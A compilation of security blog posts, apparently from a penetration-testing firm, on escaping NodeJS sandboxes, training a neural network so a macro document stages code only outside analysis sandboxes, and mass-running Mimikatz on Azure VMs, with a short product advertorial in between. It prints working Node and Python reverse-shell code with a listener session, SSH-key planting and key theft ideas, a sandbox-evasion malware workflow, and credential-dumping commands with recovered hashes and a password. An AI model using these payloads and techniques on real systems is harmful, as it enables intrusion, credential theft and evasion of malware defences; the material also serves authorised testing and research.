
Escape NodeJS Sandboxes

In this blog post, we’re going to explore how to escape NodeJS sandboxes by understanding the internals of the interpreter.

NodeJS is a JavaScript runtime built on Chrome's V8 JavaScript engine, allowing developers to use the same programming language, and possibly the same codebase, for the frontend and backend of an application. Initially released in 2009, NodeJS now boasts usage by big-name tech companies such as Netflix, Microsoft, and IBM. Today, NodeJS has been downloaded more than 250,000,000 times and continues to grow. This popularity and widespread usage make it an interesting target for exploration from a web application testing perspective.

Before NodeJS, developers had to rely on other server-side languages, such as PHP or Perl, which have security issues of their own. While NodeJS and JavaScript offer improvements, they are no different when it comes to command injection, thanks to the eval() function.

The eval function allows an application to execute arbitrary code at runtime, including commands at the operating system level. When functionality doesn't exist in the application itself, or it's simply easier to offload the work to the underlying system, developers turn to eval. Eventually, the use of this feature leads to the implementation of varying levels of sandboxing to prevent attackers like us from having the run of the underlying server.

Now, let's dive deep into NodeJS and find out how you can try to escape a NodeJS sandbox in an app that lets you execute arbitrary JavaScript.

Reverse Shell

Spend enough time as a pentester, and reverse shells become second nature. Identifying opportunities to initiate a reverse connection becomes trivial and that’s when the real fun begins. Thanks to Wiremask, we have a barebones reverse shell we can use in NodeJS:

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(8080, "192.168.1.1", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();

If you're lucky and the sandboxing is weak or non-existent, you'll receive a reverse shell and can move on with your day. Unfortunately, things don't always work out, so we'll walk through figuring out how to execute a reverse shell when require isn't available in the current environment. Removing require is a common sandboxing technique and acts as a first line of defense against attackers: if you can't import the NodeJS standard libraries, you can't easily read or write files on the operating system or establish network connections. Now, the real work begins.

Recon

The first step of any pentester's methodology is recon. We thought we were in the clear after identifying arbitrary code execution, but because of the sandboxing we have to start from square one. Our first big step is to identify what access our payload has while executing. The most straightforward way to do this is to trigger a stack trace and view the output. Unfortunately, not all web apps will simply dump the stack trace or standard error back at you. Luckily, we can use a payload to generate a stack trace and print it to standard out. Using this StackOverflow post, we see that the code is actually quite simple, especially with newer language features. Without direct console access, we have to use a print statement or return the actual trace, which the following code will do:

function stackTrace() {
    var err = new Error();
    print(err.stack);
}

After running this payload, we’ll get a stack trace:

Error
at stackTrace (lodash.templateSources[3354]:49:19)
at eval (lodash.templateSources[3354]:52:11)
at Object.eval (lodash.templateSources[3354]:65:3)
at evalmachine.<anonymous>:38:49
at Array.map (<anonymous>)
at resolveLodashTemplates (evalmachine.<anonymous>:25:25)
at evalmachine.<anonymous>:59:3
at ContextifyScript.Script.runInContext (vm.js:59:29)
at Object.runInContext (vm.js:120:6)
at /var/www/ClientServer/services/Router/sandbox.js:95:29
...

Huzzah, we know we’re in sandbox.js, running in a lodash template using eval. Now, we can try to figure out our current code context.
We'll want to try printing this, but we can't simply print the object; we'll have to use JSON.stringify():

> print(JSON.stringify(this))
< TypeError: Converting circular structure to JSON

Unfortunately this has some circular references, meaning we need a script that can identify these references and truncate them. Conveniently, we can embed JSON.prune into the payload:

> print(JSON.prune(this))
< {
"console": {},
"global": "-pruned-",
"process": {
"title": "/usr/local/nvm/versions/node/v8.9.0/bin/node",
"version": "v8.9.0",
"moduleLoadList": [ ... ],
...
}

The original JSON.prune doesn't support enumerating available functions, but we can modify the case "function" branch to output each function's name, giving a better mapping of the functions available. Running this payload gives substantial output with some interesting items. First, there's this.process.env, which contains the environment variables of the current process and may hold API keys or secrets. Second, this.process.mainModule contains the configuration of the currently running module; you may also find other application-specific items that warrant further investigation, such as config file locations. Finally, we see this.process.moduleLoadList, a list of all NodeJS modules loaded by the main process, which holds the secret to our success.

NodeJS Giving Us The Tools For Success

Let's narrow in on moduleLoadList in the main process. If we look at the original reverse shell code, we can see the two modules we need: net and child_process, which should already be loaded. From here, we research how to access modules loaded by the process. Without require, we have to use the internal libraries and APIs used by NodeJS itself. Reading through the NodeJS documentation for Process, we see some promise with dlopen(). We're going to skip over this option, however, because while it may work out with enough research, there is an easier way: process.binding(). Continuing on through the NodeJS source code itself, we eventually come to fs.js, the NodeJS library for file I/O. In here we see process.binding('fs') being used. There isn't much documentation on how this works, but we know it returns the internal fs binding. Using JSON.prune, modified to print out the function names, we can explore the available functionality:

> var fs = this.process.binding('fs');
> print(JSON.prune(fs));
< {
"access": "func access()",
"close": "func close()",
"open": "func open()",
"read": "func read()",
...
"rmdir": "func rmdir()",
"mkdir": "func mkdir()",
...
}

After further research, we learn that these are the C++ bindings used by NodeJS, and that calling them with the appropriate C/C++ function signatures allows us to read and write files. With this, we can start exploring the local filesystem and potentially gain SSH access by writing a public key to ~/.ssh/authorized_keys or reading ~/.ssh/id_rsa. However, it's common practice to isolate virtual machines from direct access and proxy the traffic, so we want to initiate a reverse shell connection to bypass this network restriction. To do this, we'll look at replicating the child_process and net packages.

Mucking about the Internals

At this point, the best path forward is researching functionality in the C++ bindings in the NodeJS repository. The process involves reading the relevant JS library (such as net.js) for a function you want to execute, then tracing the functionality back to the C++ bindings in order to piece everything together. We could rewrite net.js without require, but there's an easier way: as it turns out, CapacitorSet on GitHub did much of the heavy lifting and rewrote the functionality to execute an operating-system-level command without require: spawn_sync. The only changes we need to make to the gist are changing process.binding() to this.process.binding() and console.log() to print() (or removing it entirely). Next, we need to figure out what we can use to initiate the reverse shell. This is typical post-exploitation recon: looking for netcat, perl, python, etc. with a payload running which <binary name>, for instance which python. In this case, we have Python and the respective payload from highon.coffee's reverse shell reference:

var resp = spawnSync('python', [
    '-c',
    'import socket,subprocess,os;' +
    's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);' +
    's.connect(("127.0.0.1",443));' +
    'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);' +
    'p=subprocess.call(["/bin/sh","-i"]);'
]);
print(resp.stdout);
print(resp.stderr);

Make sure to update the "127.0.0.1" and 443 values to point to the internet-accessible IP address and port, respectively, that netcat is listening on. When we run the payload we see the sweet victory of a reverse shell:
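
For readability, here is the same Python payload expanded into a standalone script. It is functionally equivalent to the one-liner passed to spawnSync above; the IP address and port are the same placeholder values you need to change:

import os
import socket
import subprocess

# Connect back to the attacker's listener (update the IP and port).
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 443))

# Point stdin (0), stdout (1), and stderr (2) at the socket, then hand over an interactive shell.
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
subprocess.call(["/bin/sh", "-i"])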

root@netspi$ nc -nvlp 443
Listening on [0.0.0.0] (family 0, port 443)
Connection from [192.168.1.1] port 443 [tcp/*] accepted (family 2, sport 48438)
sh: no job control in this shell
sh-4.2$ whoami
whoami
user
sh-4.2$ ifconfig
ifconfig
ens5: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 9001
inet 192.168.1.1 netmask 255.255.240.0 broadcast 192.168.1.255
ether de:ad:be:ee:ef:00 txqueuelen 1000 (Ethernet)
RX packets 4344691 bytes 1198637148 (1.1 GiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4377151 bytes 1646033264 (1.5 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10
loop txqueuelen 1000 (Local Loopback)
RX packets 126582565 bytes 25595751878 (23.8 GiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 126582565 bytes 25595751878 (23.8 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

Wrap Up

From arbitrary code execution to a reverse shell, breaking out of a NodeJS sandbox is only a matter of time. This problem was rampant with early backend languages for the web, such as PHP, and it plagues us still. The lesson here is: never trust user input, and never execute user-provided code. Additionally, for pentesters, poking and prodding at the internal workings of the interpreter is incredibly valuable for finding these obscure ways to break out of a sandbox; using the system against itself will more often than not yield positive results.


Five Signs Your Application Security Assessment Process Needs a Reboot

Many organizations use manually intensive processes when onboarding their application security assessments. Compare the following process with your own experience:

  • Schedule the application security assessment.
  • Assign internal/external penetration testers to conduct the test.
  • Conduct the application security assessment and/or vulnerability scan.
  • Report application vulnerabilities to the remediation team by copying and pasting from various systems.
  • Report multiple duplicates and false positives that had been verified previously.

With a process like the one above, your organization will struggle with delayed timelines and duplicate efforts. And because the process is manual, each step in your lifecycle is prone to human error. In highly regulated industries, this wasteful approach consumes valuable resources that are already in short supply.

Ask the following five questions to assess the strength of your organization’s vulnerability management program:

  • Does your organization have multiple ways for application owners to request application assessments?
  • Do you struggle to scope the assessment properly? For example, can you acquire details such as how many dynamic pages are in your web app, the number of user roles, the application's code language, etc.?
  • Do you have to follow-up with the application owners for more information or direction after the scoping questionnaires are emailed to the pentesting team?
  • After receiving completed questionnaires, do you send login credentials via email to conduct authenticated application security tests?
  • Do you email the pentesting team a copy of the concluded assessment results, regardless of the type of test: static application security testing (SAST), dynamic application security testing (DAST) or a manual penetration test?

If you rely on email and manual processes like these for your vulnerability management program, it is probably time for a vulnerability management program overhaul!

Reduce Your Administrative Overhead by 40% to 60%

Even without the headache of sifting through duplicate findings and incurring delays, we have found that organizations can spend from 6 to 10 hours onboarding applications into the vulnerability assessment process. Organizations we've interviewed say this massive administrative overhead is reduced by 40%-60% with NetSPI Resolve™, the first commercially available security testing automation and vulnerability correlation software platform.

NetSPI Resolve reduces the time required to identify and remediate vulnerabilities, providing pentesters and their teams with comprehensive automated reporting, ticketing, and SLA management. By utilizing these Resolve features, along with the automation of questionnaire publication, organizations achieve streamlined communication and can complete vulnerability assessments faster, without sacrificing the quality of assessment results.

By reducing – and in some cases, even eliminating – the time needed for administrative tasks, pentesters are able to focus more on what they do best: test.


Machine Learning for Red Teams, Part 1

TLDR: It’s possible to detect a sandbox using a process list with machine learning.

Introduction

For attackers, aggressive collection of data often leads to the disclosure of infrastructure, initial access techniques, and malware being unceremoniously pulled apart by analysts. The application of machine learning in the defensive space has not only increased the cost of being an attacker, but has also limited a technique's operational life significantly. In the world that attackers currently find themselves in:

  • Mass data collection and analysis is accessible to defensive software, and by extension, defensive analysts
  • Machine learning is being used everywhere to accelerate defensive maturity
  • Attackers are always at a disadvantage, as we as humans try to defeat auto-learning systems that use every bypass attempt to learn more about us and predict future bypass attempts. This is especially true for public research and static bypasses.

However, as we will present here, machine learning isn’t just for blue teams. This post will explore how attackers can make use of the little data they have to perform their own machine learning. We will present a case study that focuses on initial access. By the end of the post, we hope that you will have a better understanding of machine learning, and how we as attackers can apply machine learning for our own benefit.

A Process List As Data

Before discussing machine learning, we need to take a closer look at how we as attackers process information. I would argue that attackers gather less than 1% of the information available to them on any given host or network, and use less than 3% of the collected information to make informed decisions (don’t get too hung up on the percentages). Increasing data collection efforts in the name of machine learning would come at a cost to stealth, with no foreseeable benefit. Gathering more data isn’t the best solution for attackers; attackers need to increase their data utilization. However, increasing data utilization is difficult due to the textual nature of command output. For example, other than showing particular processes, architecture, and users, what more can the following process list really provide?

PID   ARCH  SESS  SYSTEM NAME    OWNER                         PATH
1     x64   0     smss.exe       NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
4     x64   0     csrss.exe      NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
236   x64   0     wininit.exe    NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
312   x64   0     csrss.exe      NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
348   x64   1     winlogon.exe   NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
360   x64   1     services.exe   NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
400   x64   0     lsass.exe      NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
444   x64   0     lsm.exe        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsm.exe
452   x64   0     svchost.exe    NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
460   x64   0     svchost.exe    NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
564   x64   0     svchost.exe    NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
632   x64   0     svchost.exe    NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
688   x64   0     svchost.exe    NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
804   x64   0     svchost.exe    NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
852   x64   0     spoolsv.exe    NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
964   x64   0     taskhost.exe   Admin-PC\Admin                C:\Windows\system32\taskhost.exe
1004  x64   1     dwm.exe        Admin-PC\Admin                C:\Windows\system32\Dwm.exe
1044  x64   1     svchost.exe    NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
1052  x64   0     explorer.exe   Admin-PC\Admin                C:\Windows\Explorer.EXE
1064  x64   1     svchost.exe    NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
1120  x64   0     svchost.exe    NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
1188  x64   0     UI0Detect.exe  NT AUTHORITY\SYSTEM           C:\Windows\system32\UI0Detect.exe
1344  x64   0     svchost.exe    NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
1836  x64   0     taskhost.exe   NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\taskhost.exe
1972  x64   0     taskhost.exe   Admin-PC\Admin                C:\Windows\system32\taskhost.exe
508   x64   1     WinSAT.exe     Admin-PC\Admin                C:\Windows\system32\winsat.exe
828   x64   1     conhost.exe    Admin-PC\Admin                C:\Windows\system32\conhost.exe
652   x64   1     unsecapp.exe   NT AUTHORITY\SYSTEM           C:\Windows\system32\wbem\unsecapp.exe
684   x64   0     WmiPrvSE.exe   NT AUTHORITY\SYSTEM           C:\Windows\system32\wbem\wmiprvse.exe
2712  x64   0     conhost.exe    Admin-PC\Admin                C:\Windows\system32\conhost.exe
2796  x64   1     svchost.exe    NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
2852  x64   0     svchost.exe    NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
2928  x64   0     svchost.exe    NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe

Textual data also makes it hard to describe differences between two process lists: how would you describe the differences between the process lists on different hosts?

A solution to this problem already exists: we can describe a process list numerically. Looking at the process list above, we can derive some simple numerical data (a short code sketch of this derivation follows the list):

  • There are 33 processes
  • The ratio of processes to users is 8.25
  • There are 4 observable users
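
Deriving these numbers programmatically takes only a few lines. Here is a minimal Python sketch, assuming the process list has been captured in the column layout shown above; the parsing and function name are ours, not the exact tooling used for this post:

import re

def derive_features(process_list_text):
    """Return (process count, process/user ratio, user count) for a
    column-formatted process list like the one shown above."""
    lines = [line for line in process_list_text.splitlines() if line.strip()]
    rows = [re.split(r"\s{2,}", line.strip()) for line in lines[1:]]  # skip the header row
    process_count = len(rows)
    owners = {row[4] for row in rows}                 # OWNER column
    user_count = len(owners)
    ratio = process_count / user_count if user_count else 0.0
    return process_count, ratio, user_count

# For the process list above this yields (33, 8.25, 4).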

By describing items numerically, we can start to analyze differences, rank, and categorize items. Let’s add a second process list.

                     Process List A    Process List B
Process Count        33                157
Process Count/Users  8.25              157
User Count           4                 1

Viewing the numerical descriptions side-by-side reveals clear differences between each process list. We can now measure a process list on any given host, without knowing exactly what processes are running. So far, that doesn't seem so useful, but with the knowledge that Process List A is a sandbox, and Process List B is not, we can examine the four new process lists below. Which of them are sandboxes?

                  Process List C    Process List D    Process List E    Process List F
Process Count     30                84                195               34
Process/User      7.5               84                195               8.5
User Count        4                 1                 1                 4

How might we figure this out? Our solution was to sum the values of each column, then calculate the average of the host totals. For each host total, a below-average value is marked as 1 for a sandbox, and an above-average value is marked as 0 for a normal host (a short code sketch of this scoring follows the table).

                     A        B      C       D      E      F
Process Count        33       157    30      84     195    34
Process Count/User   8.25     157    7.5     84     195    8.5
User Count           4        1      4       1      1      4
Host Total           59.25    315    54.5    226    480    65.5    (Host Score Average: 168.04)
Sandbox Score        1        0      1       0      0      1
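
As promised above, the scoring itself is only a few lines of Python; a sketch using the host totals from the table, implementing exactly the arbitrary below-average rule described earlier:

# Naive scoring: hosts whose total falls below the average total are flagged as sandboxes.
host_totals = {"A": 59.25, "B": 315, "C": 54.5, "D": 226, "E": 480, "F": 65.5}

average = sum(host_totals.values()) / len(host_totals)
sandbox_scores = {host: int(total < average) for host, total in host_totals.items()}
print(sandbox_scores)  # {'A': 1, 'B': 0, 'C': 1, 'D': 0, 'E': 0, 'F': 1}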

Our solution seems to work out well; however, it was completely arbitrary. It's likely that before working through our solution, you had already figured out which process lists were sandboxes. Not only did you correctly categorize the process lists, but you did so without textual data, against four process lists you'd never seen! Using the same data points, we can use machine learning to correctly categorize a process list.

Machine Learning for Lowly Operators

The mathematical techniques used in machine learning attempt to replicate human learning. Much like the human brain has neurons, synapses, and electrical impulses that are all connected, artificial neural networks have nodes, weights, and an activation function that are all connected. Through repetition and small adjustments between each iteration, both humans and artificial neural networks are able to adjust in order to get closer to an expected output. Effectively, machine learning attempts to replicate your brain with math. Both networks operate in a similar fashion as well.

In biology, an electrical impulse is introduced into a neural network, the electrical impulse travels across a synapse, and is processed by a neuron. The strength of the electrical impulse received from the synapse determines whether or not the neuron is activated. Performing the same action repeatedly strengthens the synapses between particular neurons.
In machine learning, an input is introduced into an artificial neural network. The input travels along a link weight into a node where it is passed into an activation function. The output of the activation function determines whether or not the node is activated. By iteratively examining outputs relative to a target value, link weights can be adjusted to reduce the error.

Artificial Neural Networks (ANNs) can have an arbitrary size. The network explored in this post has 3 inputs, 3 hidden layers, and a single output. One thing to notice about the larger ANN is the number of connections between each node. Each connection represents an additional calculation we can perform, increasing both the efficiency and the accuracy of the network. Additionally, as the ANN increases in size, the math doesn't change (unless you want to get fancy); only the number of calculations does.
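
To make those mechanics concrete, here is a minimal NumPy sketch of a single forward pass. The layer sizes and random weights are illustrative only (one hidden layer of three nodes and a sigmoid activation), not the exact network trained later; the three inputs are host A's scaled features from the tables below:

import numpy as np

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

# Three scaled inputs for one host (host A from the scaled table later in this post).
inputs = np.array([-0.786, -0.501, 0.812])

rng = np.random.default_rng(0)
w_input_hidden = rng.normal(scale=0.5, size=(3, 3))    # link weights: input -> hidden
w_hidden_output = rng.normal(scale=0.5, size=(1, 3))   # link weights: hidden -> output

hidden = sigmoid(w_input_hidden @ inputs)    # hidden node activations
output = sigmoid(w_hidden_output @ hidden)   # single output node

print(output)  # untrained weights, so this is little better than a coin flip

# Training repeatedly nudges the link weights to shrink the gap between
# this output and the known label (1 for sandbox, 0 for normal host).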

Gathering and Preparing Data

Gathering a dataset of process lists is relatively easy: any document with a macro will be executed in a sandbox by any half-decent mail filter, and the rest of the hosts in the dataset are normal. To get a process list from a sandbox, or a remote system, a macro will need to gather a process list and post it back for collection and processing. For processing, the dataset needs to be parsed: the process count, process-to-user ratio, and unique process count need to be calculated and saved. Finally, each item in the dataset needs to be correctly labelled with either 0 or 1. Alternatively, the macro could gather the numerical data from the process list and post the results back. Choose your own adventure. We prefer to have the raw process list for operational purposes.

There is one more transformation we need to make to the process list data set. Earlier we compared the sum of each process list to the average of the process list totals. Using an average in this way is problematic, as very large or very small process list results could shift the average significantly. Significant shifts would reclassify potentially large numbers of hosts, introducing volatility into our predictions. To help with this, we scale (normalize) the data set. There are a few techniques to do this; we tested all the scaling functions from scikit-learn and chose the StandardScaler transform (a short sketch of this step follows the table below). What is important here is that overly large or small values no longer have such a volatile effect on classification.

                      A        B        C        D        E        F
Process Count         -0.786   1.285    -0.836   -0.065   1.92     -0.770
Process Count/User    -0.501   1.652    -0.663   0.521    0.846    -0.648
Unique Process Count  0.812    -0.902   0.813    -0.902   -0.902   0.813
Label                 1        0        1        0        0        1
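
Here is a sketch of that scaling step with scikit-learn. The raw process counts, ratios, and user counts for hosts A-F come from the earlier tables (the raw unique process counts aren't given in the post, so user count stands in as the third feature), and the printed values won't exactly match the table above because the post's scaler was fit on the full 190-sample dataset rather than on six hosts:

import numpy as np
from sklearn.preprocessing import StandardScaler

# Rows are hosts A-F; columns are process count, process count/user, user count.
raw = np.array([
    [33,  8.25, 4],
    [157, 157,  1],
    [30,  7.5,  4],
    [84,  84,   1],
    [195, 195,  1],
    [34,  8.5,  4],
])

scaler = StandardScaler()          # zero mean, unit variance per column
scaled = scaler.fit_transform(raw)
print(np.round(scaled, 3))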

Building and Training a Network

The data used in the example above is pulled from our data set. With it, we can start to explore how machine learning can help attackers detect sandboxes. At a high level, in order to successfully train an artificial neural network, we will iteratively:

  1. Introduce scaled data into the artificial neural network.
  2. Calculate the output of the activation function.
  3. Provide feedback to the network in the form of 0 or 1 (its label).
  4. Calculate the difference between the output and the feedback.
  5. Update the link weights in an attempt to reduce the difference calculated in step 4.

Some of you may be wondering about step 3. A small, but significant, detail responsible for our earlier success at detecting a sandbox was the fact that we told you "Process List A" was a sandbox. From then on, the values of Process List A provided a reference point for everything else. An artificial neural network requires a similar reference point in order to measure how "wrong" it was.

Using scikit-learn, we trained 3 models on 190 unique process lists. The data was scaled in 3 different ways, and even combined. In the end we simply chose the model that performed the best. When the network receives process list data it has never seen before, it will (hopefully) output an accurate prediction.
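
The training code itself isn't included in this post, but a minimal scikit-learn sketch of the approach might look like the following; the file names, layer size, and train/test split are our assumptions rather than the exact scratchpad code:

import joblib
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.neural_network import MLPClassifier
from sklearn.preprocessing import StandardScaler

# X: one row of derived features per process list; y: 1 for sandbox, 0 for normal host.
X = np.loadtxt("features.csv", delimiter=",")   # assumed export of the derived features
y = np.loadtxt("labels.csv", delimiter=",")

scaler = StandardScaler().fit(X)
X_train, X_test, y_train, y_test = train_test_split(
    scaler.transform(X), y, test_size=0.2, random_state=1)

model = MLPClassifier(hidden_layer_sizes=(3,), activation="logistic",
                      max_iter=5000, random_state=1)
model.fit(X_train, y_train)

print("held-out accuracy:", model.score(X_test, y_test))
print("sandbox probability:", model.predict_proba(X_test[:1]))  # confidence of the prediction

# Keep the fitted artifacts around for scoring post-backs later.
joblib.dump(scaler, "scaler.joblib")
joblib.dump(model, "model.joblib")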

Classifying a host as 1 or 0
Confidence level of prediction for the above categorization

The scratchpad code for the neural network can be found here. We opted not to explain all the math involved, although we did write it up. If you have questions, feel free to send them our way. Otherwise, if you're just generally interested, we highly recommend Tariq Rashid's book, "Make Your Own Neural Network".

Weaponizing An Artificial Neural Network

Time to put the ANN to work. To test our proof-of-concept, we wrote a simple macro that:

  1. Collected a process list
  2. Calculated the inputs (process count, process/user count, and user count)
  3. Posted the values back to our server and ran them through the neural network for a prediction
  4. If the neural network predicts a normal host, stage code, otherwise do nothing. 

Next, we uploaded the malicious document to several online malware scanners (virustotal, malware-analysis, etc) and waited. We executed the macro on a non-sandbox (first highlighted post-back), then after a few minutes 2 different sandboxes executed the macro and posted the calculated values back. Running the post-back values through the neural network provided 3 accurate predictions!

Macro post-backs (normal, sandbox, sandbox)
Probabilities and classifications for macro post-backs
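
Server-side, the staging decision then reduces to a few lines; a sketch assuming the scaler and model were saved with joblib as in the earlier training sketch, and that the macro posts back the three calculated values:

import joblib

scaler = joblib.load("scaler.joblib")   # assumed artifacts saved after training
model = joblib.load("model.joblib")

def should_stage(process_count, proc_per_user, user_count):
    """Stage code only when the model predicts a normal host (label 0)."""
    features = scaler.transform([[process_count, proc_per_user, user_count]])
    label = int(model.predict(features)[0])
    confidence = model.predict_proba(features)[0][label]
    return label == 0 and confidence > 0.9   # confidence threshold is arbitrary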

From the predictions, additional logic would be used to decide whether or not to deploy malware. Just to recap what we accomplished:

  1. Derived numerical values from a process list
  2. Built a dataset of those values, and properly scaled them
  3. Trained an artificial neural network to successfully categorize a sandbox, based on the dataset
  4. Wrote a macro to post-back required values
  5. Sent in some test payloads and used the post-back values to predict a categorization

Conclusion

Hopefully, this was a good introduction to how attackers can harness the power of machine learning. We were able to successfully classify a sandbox from the wild. Most notably, the checks were not static and harnessed knowledge of every process list in the data set. For style points, the network we created could be embedded in an Excel document, making the checks client-side.

Regardless of where the ANN we created sits, machine learning will no doubt change the face of offensive security. From malware with embedded networks to operator assistance, the possibilities are endless (and very exciting).

Credits and Sources

First and foremost, I want to thank Tariq Rashid (@rzeta0) for his book, “Make Your Own Neural Network”. It’s everything you want to know about machine learning, without all the “math-splaining.” Tariq also kindly answered a few questions I had along the way.

Secondly, I would like to thank James McCaffrey of Microsoft for checking my math and giving me back some of my sanity.

If this post piqued your interest in machine learning, I highly recommend “Make Your Own Neural Network” as a starting place.

Here are some other links that were helpful to us (if you go down this road):


Running PowerShell on Azure VMs at Scale

Let’s assume that you’re on a penetration test, where the Azure infrastructure is in scope (as it should be), and you have access to a domain account that happens to have “Contributor” rights on an Azure subscription. Contributor rights are typically harder to get, but we do see them frequently given out to developers, and if you’re lucky, an overly friendly admin may have added the domain users group as contributors for a subscription. Alternatively, we can assume that we started with a lesser privileged user and escalated up to the contributor account.

At this point, we could try to gather available credentials, dump configuration data, and attempt to further our access into other accounts (Owners/Domain Admins) in the subscription. For the purpose of this post, let’s assume that we’ve exhausted the read-only options and we’re still stuck with a somewhat privileged user that doesn’t allow us to pivot to other subscriptions (or the internal domain). At this point we may want to go after the virtual machines.

Attacking VMs

When attacking VMs, we could do some impactful testing and start pulling down snapshots of VHD files, but that’s noisy and nobody wants to download 100+ GB disk images. Since we like to tread lightly and work with the tools we have, let’s try for command execution on the VMs. In this example environment, let’s assume that none of the VMs are publicly exposed and you don’t want to open any firewall ports to allow for RDP or other remote management protocols.

Even without remote management protocols, there are a couple of different ways that we can accomplish code execution in this Azure environment. You could run commands on Azure VMs using Azure Automation, but for this post we will be focusing on the Invoke-AzureRmVMRunCommand function (part of the AzureRM module).

This handy command will allow anyone with "Contributor" rights to run PowerShell scripts on any Azure VM in a subscription as NT AUTHORITY\SYSTEM. That's right… VM command execution as SYSTEM.

Running Individual Commands

You will want to run this command from an AzureRM session in PowerShell that is authenticated with a Contributor account. You can authenticate to Azure with the Login-AzureRmAccount command.

Invoke-AzureRmVMRunCommand -ResourceGroupName VMResourceGroupName -VMName VMName -CommandId RunPowerShellScript -ScriptPath PathToYourScript

Let's break down the parameters:

  • ResourceGroupName – The Resource Group for the VM
  • VMName – The name of the VM
  • CommandId – The stored type of command to run through Azure.
    • “RunPowerShellScript” allows us to upload and run a PowerShell script, and we will just be using that CommandId for this blog.
  • ScriptPath – This is the path to your PowerShell PS1 file that you want to run

You can get both the VMName and ResourceGroupName by using the Get-AzureRmVM command. To make it easier for filtering, use this command:

PS C:\> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name

ResourceGroupName    Name       
-----------------    ----       
TESTRESOURCES        Remote-Test

In this example, we've added an extra line (Invoke-Mimikatz) to the end of the Invoke-Mimikatz.ps1 file to run the function after it's been imported. Here is a sample run of the Invoke-Mimikatz.ps1 script on the VM (where no real accounts were logged in):

PS C:\> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1
Value[0]        : 
  Code          : ComponentStatus/StdOut/succeeded
  Level         : Info
  DisplayStatus : Provisioning succeeded
  Message       :   .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Feb 16 2015 22:15:28)
                   .## ^ ##.
                   ## / \ ##  /* * *
                   ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
                   '## v ##'   https://blog.gentilkiwi.com/mimikatz             (oe.eo)
                    '#####'                                     with 15 modules * * */
 
mimikatz(powershell) # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : NetSPI-Test
Domain            : WORKGROUP
SID               : S-1-5-20         
        msv :
         [00000003] Primary
         * Username : NetSPI-Test
         * Domain   : WORKGROUP
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : NetSPI-Test
         * Domain   : WORKGROUP
         * Password : waza1234/ 
mimikatz(powershell) # exit 
Bye!   
Value[1] : Code : ComponentStatus/StdErr/succeeded 
Level : Info 
DisplayStatus : Provisioning succeeded 
Message : 
Status : Succeeded 
Capacity : 0 
Count : 0

This is handy for running your favorite PS scripts on a couple of VMs (one at a time), but what if we want to scale this to an entire subscription?

Running Multiple Commands

I’ve added the Invoke-AzureRmVMBulkCMD function to MicroBurst to allow for execution of scripts against multiple VMs in a subscription. With this function, we can run commands against an entire subscription, a specific Resource Group, or just a list of individual hosts.

You can find MicroBurst here – https://github.com/NetSPI/MicroBurst

For our demo, we’ll run Mimikatz against all (5) of the VMs in my test subscription and write the output from the script to a log file.

Import-Module MicroBurst.psm1
Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
Executing Mimikatz.ps1 against all (5) VMs in the TestingResources Subscription
Are you Sure You Want To Proceed: (Y/n):
VERBOSE: Running .\Mimikatz.ps1 on the Remote-EastUS2 - (10.2.10.4 : 52.179.214.3) virtual machine (1 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-EastUS2 - (10.2.10.4 : 52.179.214.3)
VERBOSE: Script Execution Completed in 99 seconds
